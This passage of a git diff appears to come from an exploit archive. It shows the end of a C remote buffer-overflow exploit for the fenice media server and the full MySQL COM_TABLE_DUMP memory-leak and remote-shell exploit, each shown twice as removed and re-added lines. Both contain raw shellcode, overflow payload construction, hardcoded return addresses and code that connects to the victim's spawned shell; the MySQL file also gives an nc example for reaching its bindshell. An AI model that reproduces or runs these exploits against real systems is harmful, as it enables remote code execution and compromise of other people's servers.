+"\x42\x4b\x4f\x33\x4d\x4c\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b" +"\x4b\x30\x44\x55\x4a\x46\x4f\x52\x4f\x32\x43\x47\x4a\x46\x4a\x56" +"\x4f\x42\x44\x56\x49\x36\x50\x36\x49\x48\x43\x4e\x44\x55\x43\x55" +"\x49\x58\x41\x4e\x4d\x4c\x42\x48\x5a"; + +char slack [] = "\x77\xe7\xff\xff"; // slackware 10.2 2.6.15.6 +char FC2_2_6_15[] = "\x77\xe7\xff\xff"; // Fedora core 2 , 2.6.15.4 +char debug [] = "\xdd\xdd\xdd\xdd"; // debugging purpose +char ret[4]; +char get [] = "\x47\x45\x54\x20\x2f"; +struct hostent *hp; +struct sockaddr_in con; +unsigned int rc,rc2,len=16,sock,sock2,os,addr,port; +char buffer[size]; + +// gotshell is from jamie (darkdud3) remote exploit sample +// with a bit change + +void gotshell(int sock){ + + fd_set fd_read; + char buff[1024]; + char cmd[100] = "id;uname -a\n"; + int n; + + FD_ZERO(&fd_read); + FD_SET(sock, &fd_read); + FD_SET(0, &fd_read); + send(sock, cmd, strlen(cmd), 0); + while(1) { + FD_SET(sock,&fd_read); + FD_SET(0,&fd_read); + if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; + if( FD_ISSET(sock, &fd_read) ) { + if((n=recv(sock,buff,sizeof(buff),0))<0){ + fprintf(stderr, "EOF\n"); + exit(2); + } + if(write(1,buff,n)<0)break; + } + if ( FD_ISSET(0, &fd_read) ) { + if((n=read(0,buff,sizeof(buff)))<0){ + fprintf(stderr,"EOF\n"); + exit(2); + } + if(send(sock,buff,n,0)<0) break; + } + usleep(10); + } + fprintf(stderr,"Connection aborted, select failed()\n"); + exit(0); +} + +void usage(char *arg){ + printf("-------- usage : %s host_or_ip port target\n",arg); + printf("-------- example : %s localhost 554 0\n",arg); + printf("-------- target 0 : slackware 10.2 linux-2.6.15.6 : 0\n"); + printf("-------- target 1 : Fedora core 2 linux-2.6.15.4 : 1\n"); + printf("-------- target 2 : debug : 2\n\n"); + exit(-1) ; +} + +int main(int argc,char **argv){ + + printf("\n-------- fenice - Open Media Streaming Project remote BOF exploit\n"); + printf("-------- copyrighted by c0d3r of IHS 2006\n\n"); + if(argc != 4) + usage(argv[0]); + os = (unsigned short)atoi(argv[3]); + switch(os){ + case 0: + strcat(ret,slack); + printf("[+] Targeting slackware 10.2\n"); + break; + case 1: + strcat(ret,FC2_2_6_15); + printf("[+] Targeting fedora core 2 \n"); + break; + case 2: + strcat(ret,debug); + printf("[+] Debugging\n"); + break; + default: + printf("\n[-] This target doesnt exist in the list\n\n"); + + exit(-1); + } + printf("[+] Shellcode size : %d bytes\n",sizeof(shellcode)-1); + printf("[+] Building overflow string\n"); + + // heart of exploit + + memset(buffer,inc,size); + memcpy(buffer,get,5); + memcpy(buffer+5+361,ret,4); + memcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1); + buffer[size] = 0; + + // EO heart of exploit + + hp = gethostbyname(argv[1]); + if (!hp) + addr = inet_addr(argv[1]); + if ((!hp) && (addr == INADDR_NONE) ){ + printf("[-] unable to resolve %s\n",argv[1]); + exit(-1); + } + sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); + if (!sock){ + printf("[-] socket() error...\n"); + exit(-1); + } + if (hp != NULL) + memcpy(&(con.sin_addr),hp->h_addr,hp->h_length); + else + con.sin_addr.s_addr = addr; + if (hp) + con.sin_family = hp->h_addrtype; + else + con.sin_family = AF_INET; + port=atoi(argv[2]); + con.sin_port=htons(port); + printf("[+] attacking host %s\n" , argv[1]) ; + sleep(1); + printf("[+] packet size = %d byte\n" , sizeof(buffer)); + rc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in)); + if(!rc){ + sleep(1) ; + printf("[+] connected\n") ; + printf("[+] sending the overflow string\n") ; + send(sock,buffer,strlen(buffer),0); + send(sock,"\n",1,0); + sleep(1) ; + send(sock,"\n",1,0); + sleep(1) ; + printf("[+] exploit sent successfully to %s \n" , argv[1]); + printf("[+] trying to get shell\n"); + printf("[+] connecting to %s on port 4444\n",argv[1]); + sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); + if (!sock){ + printf("[-] socket() error...\n"); + exit(-1); + } + con.sin_family = AF_INET; + con.sin_port=htons(4444); + rc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in)); + if(rc2 != 0) { + printf("[-] exploit probably failed\n"); + exit(-1); + } + if(!rc2){ + printf("[+] target exploited successfully\n"); + printf("[+] Dropping into shell\n\n"); + gotshell(sock); + } + } +} + +// milw0rm.com [2006-04-25] diff --git a/platforms/linux/remote/173.pl b/platforms/linux/remote/173.pl index 8562794b7..127ecc26e 100755 --- a/platforms/linux/remote/173.pl +++ b/platforms/linux/remote/173.pl @@ -55,6 +55,6 @@ print "sending string\n"; print $socket $buffer; close $socket; -print "\ndosed!\n"; - -# milw0rm.com [2004-04-09] +print "\ndosed!\n"; + +# milw0rm.com [2004-04-09] diff --git a/platforms/linux/remote/174.c b/platforms/linux/remote/174.c index af0e7c7d6..a3f3cf5bb 100755 --- a/platforms/linux/remote/174.c +++ b/platforms/linux/remote/174.c @@ -294,6 +294,6 @@ int main(int argc,char *argv[]) { } - - -// milw0rm.com [2004-04-12] + + +// milw0rm.com [2004-04-12] diff --git a/platforms/linux/remote/1741.c b/platforms/linux/remote/1741.c index 4a4dd2f09..2d111a6fc 100755 --- a/platforms/linux/remote/1741.c +++ b/platforms/linux/remote/1741.c @@ -1,401 +1,401 @@ -/* **************************************************************** - - April 21.st 2006 - - my_exploit.c - - MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f - - MySql <= 5.0.20 - - MySql COM_TABLE_DUMP Memory Leak - - MySql <= 4.x.x - - copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) - - GPL 2.0 - **************************************************************** - - Disclaimer: - - In no event shall the author be liable for any damages - whatsoever arising out of or in connection with the use - or spread of this information. - Any use of this information is at the user's own risk. - - **************************************************************** - - compile with: - gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit - - Then: - - my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x] - - -H: this Help; - -i: Information leak exploit (shows the content of MySql Server Memory) - -x: shows c/s communication output in hexadecimal - -t: hexadecimal table_list struct address (by default we try to find it automatically) - -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338) - -u: mysql username (anonymous too ;) - -p: mysql userpass (if you need it) - -s: the socket path if is a unix socket - -h: hostname or IP address - -P: port (default 3306) - - - Example_1 - Memoryleak: my_exploit -s socketpath -u username -i - - Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468 - - For memory leak: - - my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]] - - For the bindshell to port 2707 - my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] [-s socket|[-h hostname [-P port]]] - - then from another shell: - nc 127.0.0.1 2707 - id - uid=78(mysql) gid=78(mysql) groups=78(mysql) - - - -*/ - -#include -#include -#include - - - -// we need to know the thread struct address pointer and the table_list. -// these are defaults, change them from command line. -int thd = 0x8b1b338; -int tbl = 0x8b3a880; - -#define USOCK2 "/tmp/mysql.sock" - -char addr_tdh[4]; -char addr_tbl[4]; -char addr_ret[4]; - -// constants to overwrite packet with addresses for table_list thread and our shell. -#define TBL_POS 182 -#define THD_POS 178 -#define RET_POS 174 -#define SHL_POS 34 - -// bindshell spawns a shell with on port 2707 -char shcode[] = { - 0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 // 12 - ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1 - ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80 - ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0 - ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80 - ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f - ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 // 12*7= 84 -}; - -int tmp_idx = 0; - -int dump_packet_len = 7; -char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 }; - -int payload_len = 371; -// header packet + select '1234567890...etc' -char query_payload[] = { - 0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33 // 16 Some junk from position 6 ... - , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36 // 32 - , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39 // 48 - , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34 // 64 - , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32 // 72 - , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35 // 88 - , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38 // 94 - , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a // 112 - , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118 - , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d // 144 - , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63 // 160 - , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176 - , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75 // 192 178 - , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 208 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 224 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 240 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 256 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 272 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 288 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // - , 0x3d, 0x3d, 0x27 -}; // 16*23+3 = 371 - - - - -static int s = 0, c = 0; -int fd = 0; -int d = 1; -int hexdump = 0; -char buf[65535]; - - -MYSQL *conn; /* pointer to connection handler */ - - -int -sendit (char *buf1, int fdest, int dblen) -{ - int len1; - int i = 0; - int ret = 0; - printf ("%d\n", d); - if (d == 2) - { - // let's prepare the query packet - int o; - int position = 14; - - tmp_idx = 3; - - - int ret = tbl - 0x106 + 33; - - for (i = 0; i < 32; i += 8) - addr_ret[tmp_idx--] = (ret >> i) & 0xff; - - tmp_idx = 3; - for (i = 0; i < 32; i += 8) - addr_tdh[tmp_idx--] = (thd >> i) & 0xff; - - tmp_idx = 3; - for (i = 0; i < 32; i += 8) - addr_tbl[tmp_idx--] = (tbl >> i) & 0xff; - printf ("ret %x\n", ret); - - -#if 1 - tmp_idx = 0; - for (o = THD_POS; o > THD_POS - 4; o--) - query_payload[o] = addr_tdh[tmp_idx++]; - - tmp_idx = 0; - for (o = TBL_POS; o > TBL_POS - 4; o--) - query_payload[o] = addr_tbl[tmp_idx++]; - - tmp_idx = 0; - for (o = RET_POS; o > RET_POS - 4; o--) - query_payload[o] = addr_ret[tmp_idx++]; -#else - for (; position < payload_len - 12; position += 12) - { - tmp_idx = 0; - printf ("p:%d\n", position); - for (o = position + 4; o > position; o--) - query_payload[o] = addr_ret[tmp_idx++]; - - tmp_idx = 0; - for (o = position + 8; o > position + 4; o--) - query_payload[o] = addr_tdh[tmp_idx++]; - - tmp_idx = 0; - for (o = position + 12; o > position + 8; o--) - query_payload[o] = addr_tbl[tmp_idx++]; - - } - -#endif - - tmp_idx = 0; - for (o = SHL_POS; o < SHL_POS + 84; o++) - query_payload[o] = shcode[tmp_idx++]; - - printf ("entro\n"); - buf1 = query_payload; - len1 = payload_len; - } - else if (d >= 3) - { - printf ("entro\n"); - - // prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_TABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=0x73) - buf1 = table_dump_packet; - if (dblen >= 0) - buf1[5] = (char) dblen; - printf ("%x", (char) dblen); - len1 = dump_packet_len; - } - d++; - - printf ("\nClient -> Server\n"); - if (hexdump) - { - for (i = 0; i < len1; i++) - printf (" %.2x%c", (unsigned char) buf1[i], - ((i + 1) % 16 ? ' ' : '\n')); - printf ("\n"); - for (i = 0; i < len1; i++) - { - unsigned char f = (unsigned char) buf1[i]; - printf (" %.2c%2c", (isprint (f) ? f : '.'), - (((i + 1) % 16) ? ' ' : '\n')); - } - } - if (send (fd, buf1, len1, 0) != len1) - { - perror ("cli: send(buf3)"); - exit (1); - } - - - - fdest = fd; - - memset (buf, 0, 65535); - ret = recv (fdest, buf, 65535, 0); - printf ("\nServer -> Client\n"); - if (hexdump) - { - for (i = 0; i < ret; i++) - printf (" %.2x%c", (unsigned char) buf[i], - ((i + 1) % 16 ? ' ' : '\n')); - printf ("\n"); - for (i = 0; i < ret; i++) - { - unsigned char f = (unsigned char) buf[i]; - printf (" %.2c%2c", (isprint (f) ? f : '.'), - ((i + 1) % 16 ? ' ' : '\n')); - } - } - else - { - printf ("\n%s\n", buf + 5); - } -// printf("\nSending to client\n"); -// ret= send(c, buf, ret, 0); - - return 0; -} - -usage () -{ - printf - ("\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\n\n\ --H: this Help;\n\ --i: Information leak exploit (shows the content of MySql Server Memory)\n\ --x: shows c/s communication output in hexadecimal\n\ --t: hexadecimal table_list struct address (by default we try to find it automatically)\n\ --a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\n\ --u: mysql username (anonymous too ;)\n\ --p: mysql userpass (if you need it)\n\ --s: the socket path if is a unix socket\n\ --h: hostname or IP address\n\ --P: port (default 3306)\n\n\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\n\n\ -Example_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\n\n\ - "); - -} - -int -main (int argc, char *argv[]) -{ - - int fdest = 0; - int port = 3306; - int shell = 1; - int force_table = 0; - char buf1[65535]; - char *socket; - char *user = NULL; - char *pass = NULL; - char *host = NULL; - socket = strdup ("/tmp/mysql2.sock"); - opterr = 0; - - while ((c = getopt (argc, argv, "s:t:a:P:Hh:u:p:ix")) != -1) - switch (c) - { - case 's': - socket = (char *) optarg; - break; - case 't': - force_table = 1; - tbl = (int) strtol (optarg, NULL, 16); - //tbl=atoi( optarg ); - break; - case 'a': - thd = (int) strtol (optarg, NULL, 16); - break; - case 'u': - user = (char *) optarg; - break; - case 'p': - pass = (char *) optarg; - break; - case 'P': - port = atoi (optarg); - break; - case 'h': - host = (char *) optarg; - break; - case 'i': - shell = 0; - break; - case 'x': - hexdump = 1; - break; - case 'H': - usage (); - return 1; - default: - break; - } - - if (!force_table) - tbl = thd + 0x1f548; - conn = mysql_init (NULL); - int ret = mysql_real_connect (conn, /* pointer to connection handler */ - host, /* host to connect to */ - user, /* user name */ - pass, /* password */ - NULL, /* database to use */ - 0, /* port (use default) */ - socket, /* socket (use default) */ - 0); /* flags (none) */ - - if (!ret) - { - fprintf (stderr, "Can't connect, error : %s\n", mysql_error (conn)); - return 1; - } - printf ("using table_list:%x thread:%x\n", tbl, thd); - - fd = conn->net.fd; - - if (shell) - { - d = 2; - sendit (buf1, fdest, -1); - d = 3; - sendit (buf1, fdest, -1); - d = 3; - sendit (buf1, fdest, -1); - } - else - { - int l; - d = 3; - for (l = 0; l < 256; l++) - { - sendit (buf1, fdest, l); - } - } - mysql_close (conn); - - exit (0); -} - -// milw0rm.com [2006-05-02] +/* **************************************************************** + + April 21.st 2006 + + my_exploit.c + + MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f + + MySql <= 5.0.20 + + MySql COM_TABLE_DUMP Memory Leak + + MySql <= 4.x.x + + copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) + + GPL 2.0 + **************************************************************** + + Disclaimer: + + In no event shall the author be liable for any damages + whatsoever arising out of or in connection with the use + or spread of this information. + Any use of this information is at the user's own risk. + + **************************************************************** + + compile with: + gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit + + Then: + + my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x] + + -H: this Help; + -i: Information leak exploit (shows the content of MySql Server Memory) + -x: shows c/s communication output in hexadecimal + -t: hexadecimal table_list struct address (by default we try to find it automatically) + -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338) + -u: mysql username (anonymous too ;) + -p: mysql userpass (if you need it) + -s: the socket path if is a unix socket + -h: hostname or IP address + -P: port (default 3306) + + + Example_1 - Memoryleak: my_exploit -s socketpath -u username -i + + Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468 + + For memory leak: + + my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]] + + For the bindshell to port 2707 + my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] [-s socket|[-h hostname [-P port]]] + + then from another shell: + nc 127.0.0.1 2707 + id + uid=78(mysql) gid=78(mysql) groups=78(mysql) + + + +*/ + +#include +#include +#include + + + +// we need to know the thread struct address pointer and the table_list. +// these are defaults, change them from command line. +int thd = 0x8b1b338; +int tbl = 0x8b3a880; + +#define USOCK2 "/tmp/mysql.sock" + +char addr_tdh[4]; +char addr_tbl[4]; +char addr_ret[4]; + +// constants to overwrite packet with addresses for table_list thread and our shell. +#define TBL_POS 182 +#define THD_POS 178 +#define RET_POS 174 +#define SHL_POS 34 + +// bindshell spawns a shell with on port 2707 +char shcode[] = { + 0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 // 12 + ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1 + ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80 + ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0 + ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80 + ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f + ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 // 12*7= 84 +}; + +int tmp_idx = 0; + +int dump_packet_len = 7; +char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 }; + +int payload_len = 371; +// header packet + select '1234567890...etc' +char query_payload[] = { + 0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33 // 16 Some junk from position 6 ... + , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36 // 32 + , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39 // 48 + , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34 // 64 + , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32 // 72 + , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35 // 88 + , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38 // 94 + , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a // 112 + , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118 + , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d // 144 + , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63 // 160 + , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176 + , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75 // 192 178 + , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 208 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 224 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 240 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 256 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 272 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 288 + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // + , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // + , 0x3d, 0x3d, 0x27 +}; // 16*23+3 = 371 + + + + +static int s = 0, c = 0; +int fd = 0; +int d = 1; +int hexdump = 0; +char buf[65535]; + + +MYSQL *conn; /* pointer to connection handler */ + + +int +sendit (char *buf1, int fdest, int dblen) +{ + int len1; + int i = 0; + int ret = 0; + printf ("%d\n", d); + if (d == 2) + { + // let's prepare the query packet + int o; + int position = 14; + + tmp_idx = 3; + + + int ret = tbl - 0x106 + 33; + + for (i = 0; i < 32; i += 8) + addr_ret[tmp_idx--] = (ret >> i) & 0xff; + + tmp_idx = 3; + for (i = 0; i < 32; i += 8) + addr_tdh[tmp_idx--] = (thd >> i) & 0xff; + + tmp_idx = 3; + for (i = 0; i < 32; i += 8) + addr_tbl[tmp_idx--] = (tbl >> i) & 0xff; + printf ("ret %x\n", ret); + + +#if 1 + tmp_idx = 0; + for (o = THD_POS; o > THD_POS - 4; o--) + query_payload[o] = addr_tdh[tmp_idx++]; + + tmp_idx = 0; + for (o = TBL_POS; o > TBL_POS - 4; o--) + query_payload[o] = addr_tbl[tmp_idx++]; + + tmp_idx = 0; + for (o = RET_POS; o > RET_POS - 4; o--) + query_payload[o] = addr_ret[tmp_idx++]; +#else + for (; position < payload_len - 12; position += 12) + { + tmp_idx = 0; + printf ("p:%d\n", position); + for (o = position + 4; o > position; o--) + query_payload[o] = addr_ret[tmp_idx++]; + + tmp_idx = 0; + for (o = position + 8; o > position + 4; o--) + query_payload[o] = addr_tdh[tmp_idx++]; + + tmp_idx = 0; + for (o = position + 12; o > position + 8; o--) + query_payload[o] = addr_tbl[tmp_idx++]; + + } + +#endif + + tmp_idx = 0; + for (o = SHL_POS; o < SHL_POS + 84; o++) + query_payload[o] = shcode[tmp_idx++]; + + printf ("entro\n"); + buf1 = query_payload; + len1 = payload_len; + } + else if (d >= 3) + { + printf ("entro\n"); + + // prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_TABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=0x73) + buf1 = table_dump_packet; + if (dblen >= 0) + buf1[5] = (char) dblen; + printf ("%x", (char) dblen); + len1 = dump_packet_len; + } + d++; + + printf ("\nClient -> Server\n"); + if (hexdump) + { + for (i = 0; i < len1; i++) + printf (" %.2x%c", (unsigned char) buf1[i], + ((i + 1) % 16 ? ' ' : '\n')); + printf ("\n"); + for (i = 0; i < len1; i++) + { + unsigned char f = (unsigned char) buf1[i]; + printf (" %.2c%2c", (isprint (f) ? f : '.'), + (((i + 1) % 16) ? ' ' : '\n')); + } + } + if (send (fd, buf1, len1, 0) != len1) + { + perror ("cli: send(buf3)"); + exit (1); + } + + + + fdest = fd; + + memset (buf, 0, 65535); + ret = recv (fdest, buf, 65535, 0); + printf ("\nServer -> Client\n"); + if (hexdump) + { + for (i = 0; i < ret; i++) + printf (" %.2x%c", (unsigned char) buf[i], + ((i + 1) % 16 ? ' ' : '\n')); + printf ("\n"); + for (i = 0; i < ret; i++) + { + unsigned char f = (unsigned char) buf[i]; + printf (" %.2c%2c", (isprint (f) ? f : '.'), + ((i + 1) % 16 ? ' ' : '\n')); + } + } + else + { + printf ("\n%s\n", buf + 5); + } +// printf("\nSending to client\n"); 